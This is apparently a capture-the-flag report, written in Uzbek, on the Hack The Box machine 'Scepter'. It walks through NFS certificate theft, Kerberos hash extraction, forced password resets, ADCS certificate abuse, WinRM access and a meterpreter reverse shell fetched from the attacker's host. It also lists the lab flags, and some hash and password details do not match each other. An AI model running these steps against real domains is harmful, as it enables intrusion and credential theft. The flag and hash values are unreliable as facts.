Scepter

Umumiy Ma’lumotlar
IP address xx.xx.xx.xx

Microsoft Windows Server 2019

Operatsion Tizim Nomi (Distribution)
Standard
Operatsion Tizim Kernel Verisyasi 10.0.17763 N/A Build 17763
Web Server dasturi va Versiyasi —

53, 88, 111, 135, 139, 389, 445,

Ochiq Portlar 464, 593, 636, 2049, 3268,
3269, 5985, 5986

Topilgan Flaglar

💡 Flag ni belgilangan bo’limga nusxa ko’chirib tashlang. Bundan tashqari

flag topilgan ekran screenshotini ham ushbu bo’limga tashlang.

User Flag

💡 User Flag: 109ed4eb16a3e6be0be8368c0f6ca1775

Scepter 1
 Root Flag

💡 Root Flag: bfa210003342f1962a476d176a2fe57dd

Toplgan Zaifliklar

💡 Har bitta topilgan zaiflikni shu yerda to’ldirib, u haqida batafsil malumot
olish uchun link qoldirasiz. U zaiflik nimalarga saba bo’lishi va qaysi
explit orqali buzilishinni ham shu yerda tushuntirib berishingiz kerak.
Birnchida keltirilgan zaiflik bu sizga misol sifatida keltirilgan. Nechta
zaiflik topa olsangiz barchasini kiriting.

CVE-XXXX-XXXX Ushbu CVE x dasturining 2.X.X-versiyasida Exploit linki

mavjud bo’lib, hujumchiga X hujumni amalga berilishi kerak agar
oshirishga yordam beradi. Bu zaiflik X zailik deb mavjud bo’lsa

Scepter 2
 ataladi. Ushu havola orqali batafsil o’rganib
chiqish mumkin. [Link qoldirasiz.]

Hisobot

💡 Har bitta bosqichda qilgan ishlaringizni batafsil, screenshotlar,

foydalanilgan explitlar bilan tushuntirib yozing.

Enumeration (Ma’lumot to’plash)

xx.xx.xx.xx ip bor va nmap bilan scan qilamiz

㉿
┌──(kali kali)-[~]
└─$ nmap -sSCV -Pn xx.xx.xx.xx --min-rate 10000
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-19 15:34 EDT
Nmap scan report for 10.10.11.65
Host is up (0.097s latency).
Not shown: 985 closed tcp ports (reset)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 20
25-04-20 03:34:33Z)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service

Scepter 3
 | 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/tcp6 rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 2,3,4 111/udp6 rpcbind
| 100003 2,3 2049/udp nfs
| 100003 2,3 2049/udp6 nfs
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/tcp6 nfs
| 100005 1,2,3 2049/tcp mountd
| 100005 1,2,3 2049/tcp6 mountd
| 100005 1,2,3 2049/udp mountd
| 100005 1,2,3 2049/udp6 mountd
| 100021 1,2,3,4 2049/tcp nlockmgr
| 100021 1,2,3,4 2049/tcp6 nlockmgr
| 100021 1,2,3,4 2049/udp nlockmgr
| 100021 1,2,3,4 2049/udp6 nlockmgr
| 100024 1 2049/tcp status
| 100024 1 2049/tcp6 status
| 100024 1 2049/udp status
|_ 100024 1 2049/udp6 status
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Doma
in: scepter.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-04-20T03:35:32+00:00; +8h00m00s from scanner time.
| ssl-cert: Subject: commonName=dc01.scepter.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>,
DNS:dc01.scepter.htb
| Not valid before: 2024-11-01T03:22:33
|_Not valid after: 2025-11-01T03:22:33
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Dom
ain: scepter.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.scepter.htb

Scepter 4
 | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>,
DNS:dc01.scepter.htb
| Not valid before: 2024-11-01T03:22:33
|_Not valid after: 2025-11-01T03:22:33
|_ssl-date: 2025-04-20T03:35:32+00:00; +8h00m00s from scanner time.
2049/tcp open nlockmgr 1-4 (RPC #100021)
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Dom
ain: scepter.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.scepter.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>,
DNS:dc01.scepter.htb
| Not valid before: 2024-11-01T03:22:33
|_Not valid after: 2025-11-01T03:22:33
|_ssl-date: 2025-04-20T03:35:32+00:00; +8h00m00s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Do
main: scepter.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-04-20T03:35:32+00:00; +8h00m00s from scanner time.
| ssl-cert: Subject: commonName=dc01.scepter.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>,
DNS:dc01.scepter.htb
| Not valid before: 2024-11-01T03:22:33
|_Not valid after: 2025-11-01T03:22:33
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
5986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| ssl-cert: Subject: commonName=dc01.scepter.htb
| Subject Alternative Name: DNS:dc01.scepter.htb
| Not valid before: 2024-11-01T00:21:41
|_Not valid after: 2025-11-01T00:41:41
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
| tls-alpn:
|_ http/1.1
|_ssl-date: 2025-04-20T03:35:32+00:00; +8h00m00s from scanner time.
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Scepter 5
 Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-04-20T03:35:22
|_ start_date: N/A
|_clock-skew: mean: 7h59m59s, deviation: 0s, median: 7h59m59s

Service detection performed. Please report any incorrect results at https://

nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 66.85 seconds

dc01.scepter.htb va scepter.htb /etc/hostsga yozamiz

xx.xx.xx.xx dc01.scepter.htb scepter.htb

endi smb test qilamiz

┌──(kali ㉿kali)-[~/Desktop/CVE-2023-46818-Exploit]
└─$ enum4linux-ng -A xx.xx.xx.xx
ENUM4LINUX - next generation (v1.3.4)

==========================
| Target Information |
==========================
[*] Target ........... xx.xx.xx.xx
[*] Username ......... ''
[*] Random Username .. 'jzmwvnll'
[*] Password ......... ''
[*] Timeout .......... 5 second(s)

====================================
| Listener Scan on 10.10.11.65 |
====================================

Scepter 6
 [*] Checking LDAP
[+] LDAP is accessible on 389/tcp
[*] Checking LDAPS
[+] LDAPS is accessible on 636/tcp
[*] Checking SMB
[+] SMB is accessible on 445/tcp
[*] Checking SMB over NetBIOS
[+] SMB over NetBIOS is accessible on 139/tcp

===================================================
| Domain Information via LDAP for xx.xx.xx.xx |
===================================================
[*] Trying LDAP
[+] Appears to be root/parent DC
[+] Long domain name is: scepter.htb

=====================================================
=====
| NetBIOS Names and Workgroup/Domain for xx.xx.xx.xx |
=====================================================
=====
[-] Could not get NetBIOS names information via 'nmblookup': timed out

========================================
| SMB Dialect Check on xx.xx.xx.xx |
========================================
[*] Trying on 445/tcp
[+] Supported dialects and settings:
Supported dialects:
SMB 1.0: false
SMB 2.02: true
SMB 2.1: true
SMB 3.0: true
SMB 3.1.1: true
Preferred dialect: SMB 3.0
SMB1 only: false

Scepter 7
 SMB signing required: true

=====================================================
=====
| Domain Information via SMB session for xx.xx.xx.xx |
=====================================================
=====
[*] Enumerating via unauthenticated SMB session on 445/tcp
[+] Found domain information via SMB
NetBIOS computer name: DC01
NetBIOS domain name: SCEPTER
DNS domain: scepter.htb
FQDN: dc01.scepter.htb
Derived membership: domain member
Derived domain: SCEPTER

========================================
| RPC Session Check on xx.xx.xx.xx |
========================================
[*] Check for null session
[+] Server allows session using username '', password ''
[*] Check for random user
[-] Could not establish random user session: STATUS_LOGON_FAILURE

==================================================
| Domain Information via RPC for xx.xx.xx.xx |
==================================================
[+] Domain: SCEPTER
[+] Domain SID: S-1-5-21-74879546-916818434-740295365
[+] Membership: domain member

==============================================
| OS Information via RPC for xx.xx.xx.xx |
==============================================
[*] Enumerating via unauthenticated SMB session on 445/tcp
[+] Found OS information via SMB

Scepter 8
 [*] Enumerating via 'srvinfo'
[-] Could not get OS info via 'srvinfo': STATUS_ACCESS_DENIED
[+] After merging OS information we have the following result:
OS: Windows 10, Windows Server 2019, Windows Server 2016
OS version: '10.0'
OS release: '1809'
OS build: '17763'
Native OS: not supported
Native LAN manager: not supported
Platform id: null
Server type: null
Server type string: null

====================================
| Users via RPC on xx.xx.xx.xx |
====================================
[*] Enumerating users via 'querydispinfo'
[-] Could not find users via 'querydispinfo': STATUS_ACCESS_DENIED
[*] Enumerating users via 'enumdomusers'
[-] Could not find users via 'enumdomusers': STATUS_ACCESS_DENIED

=====================================
| Groups via RPC on xx.xx.xx.xx |
=====================================
[*] Enumerating local groups
[-] Could not get groups via 'enumalsgroups domain': STATUS_ACCESS_D
ENIED
[*] Enumerating builtin groups
[-] Could not get groups via 'enumalsgroups builtin': STATUS_ACCESS_DE
NIED
[*] Enumerating domain groups
[-] Could not get groups via 'enumdomgroups': STATUS_ACCESS_DENIED

=====================================
| Shares via RPC on xx.xx.xx.xx |
=====================================

Scepter 9
 [*] Enumerating shares
[+] Found 0 share(s) for user '' with password '', try a different user

========================================
| Policies via RPC for xx.xx.xx.xx |
========================================
[*] Trying port 445/tcp
[-] SMB connection error on port 445/tcp: STATUS_ACCESS_DENIED
[*] Trying port 139/tcp
[-] SMB connection error on port 139/tcp: session failed

========================================
| Printers via RPC for xx.xx.xx.xx |
========================================
[-] Could not get printer info via 'enumprinters': STATUS_ACCESS_DENIED

Completed after 19.83 seconds

smb yopiq va password va user kerak ishlatish uchun

2049 (NFS) – Bu odatda Linux tizimlarida bo‘ladi, lekin bu yerda ham ochiq va
buni tekshiramiz

㉿
┌──(kali kali)-[~/Desktop/]
└─$ showmount -e xx.xx.xx.xx
Export list for xx.xx.xx.xx:
/helpdesk (everyone)

Bizda /helpdesk katalogi NFS orqali export qilingan va u everyone (ya’ni, har kim)
uchun ochiq! Bu – juda foydali va ekspluatatsiya qilish mumkin bo‘lgan holat.

┌──(kali ㉿kali)-[~/Desktop/]
└─$ mkdir /tmp/helpdesk-nfs

┌──(kali ㉿kali)-[~/Desktop/]
└─$ sudo mount -t nfs xx.xx.xx.xx:/helpdesk /tmp/helpdesk-nfs

Scepter 10
 ┌──(kali㉿kali)-[~]
└─$ sudo ls -la /tmp/helpdesk-nfs
total 21
drwx------ 2 nobody nogroup 64 Nov 1 23:02 .
drwxrwxrwt 25 root root 580 Apr 19 15:43 ..
-rwx------ 1 nobody nogroup 2484 Nov 1 23:01 baker.crt
-rwx------ 1 nobody nogroup 2029 Nov 1 23:01 baker.key
-rwx------ 1 nobody nogroup 3315 Nov 1 23:01 clark.pfx
-rwx------ 1 nobody nogroup 3315 Nov 1 23:01 lewis.pfx
-rwx------ 1 nobody nogroup 3315 Nov 1 23:02 scott.pfx

Exploitation (Buzib kirish)

Endi

㉿
┌──(root kali)-[/tmp/helpdesk-nfs]
└─# sudo openssl pkcs12 -export -out /home/kali/Desktop/HTB/Specter/b
aker.pfx -inkey baker.key -in baker.crt -passout pass:
Enter pass phrase for baker.key:

㉿
┌──(kali kali)-[~/Desktop/HTB/Specter]
└─$ ll
total 4
-rw------- 1 root root 3379 Apr 19 16:36 baker.pfx

㉿
┌──(kali kali)-[~/Desktop/HTB/Specter]
└─$ sudo chmod 777 baker.pfx
[sudo] password for kali:

㉿
┌──(kali kali)-[~/Desktop/HTB/Specter]
└─$ sudo ntpdate xx.xx.xx.xx | certipy-ad auth -pfx baker.pfx -dc-ip 10.10.
11.65
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: [email protected]

Scepter 11
 [*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'd.baker.ccache'
[*] Trying to retrieve NT hash for 'd.baker'
[-] Got error: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too g
reat)
[-] Use -debug to print a stacktrace

㉿
┌──(kali kali)-[~/Desktop/HTB/Specter]
└─$ sudo ntpdate xx.xx.xx.xx | certipy-ad auth -pfx baker.pfx -dc-ip xx.xx.
xx.xx
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: [email protected]

[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'd.baker.ccache'
[*] Trying to retrieve NT hash for 'd.baker'
[*] Got hash for '[email protected]': aad3b435b51404eeaad3b435b514
04ee:18b5fb0d99e7a475316213c15b6f227ce

Endi /etc/resolv.conf ga nameserver qo’shishimiz kerak

㉿
┌──(root kali)-[/home/kali/Desktop/HTB/Specter]
└─# cat /etc/resolv.conf
nameserver xx.xx.xx.xx
nameserver 8.8.8.8
nameserver 1.1.1.1

㉿
┌──(root kali)-[/home/kali/Desktop/HTB/Specter]
└─# sudo bloodhound-python -u 'd.baker' --hashes 'aad3b435b51404eea
ad3b435b51404ee:18b5fb0d99e7a475316213c15b6f227ce' -d scepter.htb
-dc dc01.scepter.htb --auth-method ntlm -c All --zip --disable-autogc
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: scepter.htb

Scepter 12
 INFO: Connecting to LDAP server: dc01.scepter.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.scepter.htb
INFO: Found 11 users
INFO: Found 57 groups
INFO: Found 2 gpos
INFO: Found 3 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc01.scepter.htb
INFO: Done in 00M 24S
INFO: Compressing output into 20250419170124_bloodhound.zip

┌──(root ㉿kali)-[/home/kali/Desktop/HTB/Specter]
└─# ll
total 160
-rw-r--r-- 1 root root 152421 Apr 19 17:01 20250419170124_bloodhound.zip
-rwxrwxrwx 1 root root 3379 Apr 19 16:36 baker.pfx
-rw-rw-r-- 1 kali kali 1542 Apr 20 2025 d.baker.ccache

Scepter 13
 Bizda d.baker userini a.carter userini passwordini o’zgartirishga huquqi bor va
biz bundan foydalanamiz

㉿
┌──(kali kali)-[~/…/Haze/splunksecrets/venv/bin]
└─$ impacket-changepasswd 'scepter.htb'/'a.carter'@xx.xx.xx.xx -reset -
altuser 'd.baker' -althash :'18b5fb0d99e7a475316213c15b6f227ce'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

New password: Password123

Retype new password: Password123
[*] Setting the password of scepter.htb\a.carter as scepter.htb\d.baker
[*] Connecting to DCE/RPC as scepter.htb\d.baker
[*] Password was changed successfully.
[!] User no longer has valid AES keys for Kerberos, until they change their
password again.

㉿
┌──(kali kali)-[~/…/Haze/splunksecrets/venv/bin]
└─$ nxc smb xx.xx.xx.xx -u 'a.carter' -p 'Password123'
SMB xx.xx.xx.xx 445 DC01 [*] Windows 10 / Server 2019 B
uild 17763 x64 (name:DC01) (domain:scepter.htb) (signing:True) (SMBv1:Fa
lse)
SMB xx.xx.xx.xx 445 DC01 [+] scepter.htb\a.carter:newpas
sword123

Endi yana bloodhound-python bilan a.carter useri nomidan scan qilamiz

㉿
┌──(kali kali)-[~/Desktop/HTB/Specter]
└─$ bloodhound-python -c ALL -u a.carter -p 'Password123' -d scepter.ht
b -ns xx.xx.xx.xx --zip

INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)

INFO: Found AD domain: scepter.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authenticatio
n. Error: Kerberos SessionError: KDC_ERR_PREAUTH_FAILED(Pre-authenti
cation information was invalid)

Scepter 14
 INFO: Connecting to LDAP server: dc01.scepter.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.scepter.htb
INFO: Found 11 users
INFO: Found 57 groups
INFO: Found 2 gpos
INFO: Found 3 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc01.scepter.htb
INFO: Done in 00M 23S
INFO: Compressing output into 20250419174424_bloodhound.zip

┌──(kali㉿kali)-[~/Desktop/HTB/Specter]
└─$ ll
total 312
-rw-r--r-- 1 root root 152421 Apr 19 17:01 20250419170124_bloodhound.zip
-rw-rw-r-- 1 kali kali 152696 Apr 19 17:44 20250419174424_bloodhound.zi
p
-rwxrwxrwx 1 root root 3379 Apr 19 16:36 baker.pfx
-rw-rw-r-- 1 kali kali 1542 Apr 20 2025 d.baker.ccache

Scepter 15
 uchun hash bilan Kerberos TGT olamiz va bu TGT
d.baker .ccache faylga
saqlanadi va uni export qilamiz

㉿
┌──(root kali)-[/usr/share/doc/python3-impacket/examples]
└─# ntpdate -u xx.xx.xx.xx | impacket-getTGT -no-pass -hashes :18b5fb0
d99e7a475316213c15b6f22ce scepter.htb/'d.baker'@dc01.scepter.htb

Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Saving ticket in [email protected]

export [email protected]

Scepter 16
 d.baker foydalanuvchisi a.carter foydalanuvchisining parolini o‘zgartira oladi.
ForceChangePassword huquqi orqali o’zgartiramiz

㉿
┌──(root kali)-[/usr/share/doc/python3-impacket/examples]
└─# ntpdate -u xx.xx.xx.xx | bloodyAD -d scepter.htb -u d.baker -k --host
dc01.scepter.htb --dc-ip xx.xx.xx.xx set password a.carter Password123
[+] Password changed successfully!

Biz IT support group azosimiz va shu group STAFF ACCESS CERTIFICATE ustidan
genericAll huquqiga ega
a.carter foydalanuvchisiga STAFF ACCESS CERTIFICATE nomli OU'dagi ob'ekt ustida
to'liq nazorat (FullControl) huquqini olamiz

Scepter 17
 ┌──(root ㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─# ntpdate -u xx.xx.xx.xx | bloodyAD -d scepter.htb -u a.carter -p Passw
ord123 --host dc01.scepter.htb --dc-ip xx.xx.xx.xx add genericAll "OU=ST
AFF ACCESS CERTIFICATE,DC=SCEPTER,DC=HTB" a.carter
[+] a.carter has now GenericAll on OU=STAFF ACCESS CERTIFICATE,DC=
SCEPTER,DC=HTB

a.carter endi:

Ushbu OU ichidagi foydalanuvchilarni tahrir qilishi

Yangi userlar yaratishi yoki mavjudlarini o‘zgartirishi

Delegatsiya berishi, DACL-ni o‘zgartirishi va hokazo

Biz
a.carterfoydalanuvchisi orqali d.baker foydalanuvchisining mail atributini
o‘zgartirib ko’ramiz va ishlashini tekshiramiz

㉿
┌──(root kali)-[/usr/share/doc/python3-impacket/examples]
└─# ntpdate -u xx.xx.xx.xx | bloodyAD -d scepter.htb -u a.carter -p Passw
ord123 --host dc01.scepter.htb set object d.baker mail -v h.brown@scepte
r.htb
[+] d.baker's mail has been updated'

Bizda ishladi

certipy-adyordamida d.baker foydalanuvchisi uchun sertifikat so'rovini yuborib

sertifikat olishga harakat qilamiz

㉿
┌──(root kali)-[/usr/share/doc/python3-impacket/examples]
└─# ntpdate -u xx.xx.xx.xx | certipy-ad req -username "[email protected]
tb" -hashes 18b5fb0d99e7a475316213c15b6f227ce -target "dc01.scepter.h
tb" -ca 'scepter-DC01-CA' -template 'StaffAccessCertificate'
Certipy v4.8.2 - by Oliver Lyak (ly4k)

/usr/lib/python3/dist-packages/certipy/commands/req.py:459: SyntaxWar

Scepter 18
 ning: invalid escape sequence '\('
"(0x[a-zA-Z0-9]+) \([-]?[0-9]+ ",
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 20
[*] Got certificate without identification
[*] Certificate has no object SID
[*] Saved certificate and private key to 'd.baker.pfx'

Sertifikat so'rovi muvaffaqiyatli amalga oshirildi.

yordamida d.baker.pfx sertifikatidan foydalangan holda
certipy-ad

[email protected] foydalanuvchisi uchun autentifikatsiya qilish jarayoni

amalga oshiramiz va Ticket Granting Ticket (TGT) olishga harakat qilamiz

┌──(root ㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─# sudo ntpdate -u xx.xx.xx.xx

㉿
┌──(root kali)-[/usr/share/doc/python3-impacket/examples]
└─# ntpdate -u xx.xx.xx.xx | certipy-ad auth -pfx d.baker.pfx -domain sce
pter.htb -dc-ip xx.xx.xx.xx -username h.brown
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[!] Could not find identification in the provided certificate

[*] Using principal: [email protected]
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'h.brown.ccache'
[*] Trying to retrieve NT hash for 'h.brown'
[*] Got hash for '[email protected]': aad3b435b51404eeaad3b435b51
404ee:4ecf5242092c6fb8c360a08069c75a70c

Biz h.brown.ccache oldik endi bu orqali shu userga kirishimiz mumkun

/etc/krb5.conf ga shuni qo’shamiz

Scepter 19
 cat /etc/krb5.conf
[libdefaults]
default_realm = SCEPTER.HTB
dns_lookup_realm = false
dns_lookup_kdc = true

[realms]
SCEPTER.HTB = {
kdc = dc01.scepter.htb
admin_server = dc01.scepter.htb
}

[domain_realm]
.scepter.htb = SCEPTER.HTB
scepter.htb = scepter.HTB

Initial Access (Kirish huquqiga erishish)

Endi cashe saqlab evil-winrm bilan bog’lanamiz

┌──(root ㉿kali)-[/home/…/Desktop/HTB/Specter/kerbrute]
└─# ll
total 100
drwxr-xr-x 2 root root 4096 Apr 19 18:53 cmd
-rw-r--r-- 1 root root 1342 Apr 20 2025 [email protected]
-rw-r--r-- 1 root root 2913 Apr 19 21:07 d.baker.pfx
drwxr-xr-x 2 root root 4096 Apr 19 18:55 dist
-rw-r--r-- 1 root root 394 Apr 19 18:53 go.mod
-rw-r--r-- 1 root root 33180 Apr 19 18:53 go.sum
-rw-r--r-- 1 root root 1558 Apr 20 2025 h.brown.ccache

㉿
┌──(root kali)-[/home/…/Desktop/HTB/Specter/kerbrute]
└─# export KRB5CCNAME=./h.brown.ccache

┌──(root ㉿kali)-[/home/…/Desktop/HTB/Specter/kerbrute]
└─# klist

Scepter 20
 Ticket cache: FILE:./h.brown.ccache
Default principal: [email protected]

Valid starting Expires Service principal

04/20/2025 05:08:18 04/20/2025 09:08:18 krbtgt/SCEPTER.HTB@SCEPT
ER.HTB
renew until 04/20/2025 09:08:18

㉿
┌──(root kali)-[/home/…/Desktop/HTB/Specter/kerbrute]
└─# ntpdate -u xx.xx.xx.xx
2025-04-20 05:17:08.116561 (-0400) +28798.361028 +/- 0.070279 10.10.11.
65 s1 no-leap
CLOCK: time stepped by 28798.361028

㉿
┌──(root kali)-[/home/…/Desktop/HTB/Specter/kerbrute]
└─# evil-winrm -i dc01.scepter.htb -r scepter.htb -u h.brown

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: quoti

ng_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/

Hackplayers/evil-winrm#Remote-path-completion

Warning: User is not needed for Kerberos auth. Ticket will be used

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\h.brown\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\h.brown\Desktop> dir

Directory: C:\Users\h.brown\Desktop

Scepter 21
 Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 4/19/2025 7:56 PM 34 user.txt

*Evil-WinRM* PS C:\Users\h.brown\Desktop> type user.txt

109ed4eb16a3e6be0be8368c0f6ca1775
*Evil-WinRM* PS C:\Users\h.brown\Desktop>

Privilage Escalation (Huquqlarni oshirish)

Endi metasploit bilan bog’lanamiz

㉿
┌──(kali kali)-[~/Desktop/Tools]
└─$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=xx.xx.14.
xx LPORT=5555 -f exe -o shell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows fr
om the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 7168 bytes

Scepter 22
 Saved as: shell.exe

㉿
┌──(kali kali)-[~/Desktop/Tools]
└─$ python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
=====================================================
=================

*Evil-WinRM* PS C:\Users\h.brown\Documents> cd /
*Evil-WinRM* PS C:\> cd Temp
*Evil-WinRM* PS C:\Temp> Invoke-WebRequest -Uri "http://xx.xx.14.xx:80
00/shell.exe" -Outfile "C:\Temp\shell.exe"
*Evil-WinRM* PS C:\Temp> dir

Directory: C:\Temp

Mode LastWriteTime Length Name

---- ------------- ------ ----
-a---- 4/20/2025 12:53 PM 7168 shell.exe

*Evil-WinRM* PS C:\Temp> ./shell.exe

=====================================================
===================
msf6 exploit(multi/handler) > use exploit/multi/handler
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/revers
e_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST xx.xx.14.xx
LHOST => xx.xx.14.xx
msf6 exploit(multi/handler) > set LPORT 5555
LPORT => 5555
msf6 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on xx.xx.14.xx:5555
[*] Sending stage (203846 bytes) to xx.xx.xx.xx

Scepter 23
 [*] Meterpreter session 1 opened (xx.xx.14.xx:5555 -> xx.xx.xx.xx:60904) a
t 2025-04-20 07:55:27 -0400

meterpreter > shell

Process 4912 created.
Channel 1 created.
Microsoft Windows [Version 10.0.17763.7136]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Temp>

a.carter foydalanuvchisi orqali domenga yangi kompyuter qo’shamiz

Komputer name CN=meow

Paroli Password123

㉿
┌──(root kali)-[/home/kali/Desktop/HTB/Specter]
└─# ntpdate -u xx.xx.xx.xx | bloodyAD --host dc01.scepter.htb -d scepter.
htb -u a.carter -p 'Password123' --dc-ip xx.xx.xx.xx add computer meow
'Password123'
[+] meow created

meow$ nomli kompyuter akkauntidan foydalanib, Active Directory Certificate

Services (AD CS) orqali kompyuter sertifikati olishga harakat qilamiz

㉿
┌──(root kali)-[/home/kali/Desktop/HTB/Specter]
└─# ntpdate -u xx.xx.xx.xx | certipy-ad req -ca scepter-DC01-CA -templat
e Machine -target xx.xx.xx.xx -username meow$ -password 'Password12
3'
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC

[*] Successfully requested certificate
[*] Request ID is 5
[*] Got certificate with DNS Host Name 'meow.scepter.htb'
[*] Certificate object SID is 'S-1-5-21-74879546-916818434-740295365-9

Scepter 24
 101'
[*] Saved certificate and private key to 'meow.pfx'

Olingan Sertifikatni .crt formatga ajratamiz

㉿
┌──(root kali)-[/home/kali/Desktop/HTB/Specter]
└─# certipy-ad cert -pfx meow.pfx -nokey -out meow.crt
Certipy v4.8.2 - by Oliver Lyak (ly4k)

Sertifikatni analiz qilamiz

㉿
┌──(root kali)-[/home/kali/Desktop/HTB/Specter]
└─# openssl x509 -in meow.crt -noout -serial -issuer
serial=6200000005C9A87AF961EDF48E000000000005
issuer=DC=htb, DC=scepter, CN=scepter-DC01-CA

serial 2 tasini orasiga ikki nuqta qo’yib binary stringg aylantiramiz

62:00:00:00:05:C9:A8:7A:F9:61:ED:F4:8E:00:00:00:00:00:05

Active Directory Certificate Services (ADCS) tizimida har bir sertifikat

Issuer + SerialNumber orqali aniqlanadi. Endi shu formatga o’tkazish uchun
serial ni reverse qilamiz. sertifikatni AD foydalanuvchisiga bog‘lash uchun
kerakli formatda qilamiz

nano conv.py

=====================================================
===========================

import argparse

def convert(serial, issuer):

serial = serial.replace(':', '').lower()
serial_bytes = bytearray.fromhex(serial)
serial_bytes.reverse()

Scepter 25
 serial_hex = ''.join(['%02x' % b for b in serial_bytes])

issuer_parts = issuer.split(',')
issuer_parts = [p.strip() for p in issuer_parts]
issuer_parts.reverse()
issuer_str = ','.join(issuer_parts)

print(f"X509:<I>{issuer_str}<SR>{serial_hex}")

if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-serial', required=True, help='Certificate serial (co
lon separated)')
parser.add_argument('-issuer', required=True, help='Certificate issuer')
args = parser.parse_args()

convert(args.serial, args.issuer)

map degan o‘zgaruvchiga sertifikat identifikatorini ( altSecurityIdentities ) saqlimiz

㉿
┌──(root kali)-[/home/kali/Desktop/HTB/Specter]
└─# python3 conv.py -serial '62:00:00:00:05:C9:A8:7A:F9:61:ED:F4:8E:00:
00:00:00:00:05' -issuer 'CN=scepter-DC01-CA,DC=scepter,DC=htb'
X509:<I>DC=htb,DC=scepter,CN=scepter-DC01-CA<SR>0500000000008
ef4ed61f97aa8c90500000062
=====================================================
=======================

meterpreter > shell

Process 1028 created.
Channel 1 created.
Microsoft Windows [Version 10.0.17763.7136]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Temp>powershell
powershell

Scepter 26
 Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Temp> $map = 'X509:<I>DC=htb,DC=scepter,CN=scepter-DC01-CA

<SR>0500000000008ef4ed61f97aa8c90500000062'
$map = 'X509:<I>DC=htb,DC=scepter,CN=scepter-DC01-CA<SR>050000
0000008ef4ed61f97aa8c90500000062'

p.adams userining altSecurityIdentities atributiga hozirgi sertifikatni qo‘shamiz

PS C:\Temp> Set-ADUser p.adams -Replace @{altSecurityIdentities=$ma

p}
Set-ADUser p.adams -Replace @{altSecurityIdentities=$map}
PS C:\Temp>

